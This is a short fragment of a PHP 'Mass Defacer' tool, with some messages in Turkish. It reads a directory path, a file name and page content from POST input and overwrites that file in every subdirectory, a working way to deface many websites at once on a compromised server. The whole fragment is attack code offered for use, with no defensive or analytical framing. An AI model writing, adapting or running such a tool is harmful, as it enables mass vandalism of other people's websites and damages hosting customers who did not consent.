http://facebook.com/#
*/
echo "
- Mass Defacer -";
echo "";
if (isset ($_POST['base_dir']))
{
if (!file_exists ($_POST['base_dir']))
die ($_POST['base_dir']." Dosya Yok !
");
if (!is_dir ($_POST['base_dir']))
die ($_POST['base_dir']." Is Not A Directory !
");
@chdir ($_POST['base_dir']) or die ("Cannot Open Directory");
$files = @scandir ($_POST['base_dir']) or die ("oohhh shet
");
foreach ($files as $file):
if ($file != "." && $file != ".." && @filetype ($file) == "dir")
{
$index = getcwd ()."/".$file."/".$_POST['file_name'];
if (file_put_contents ($index, $_POST['index']))
echo "$index    OK'EY BRAT
";
}
endforeach;
}
?>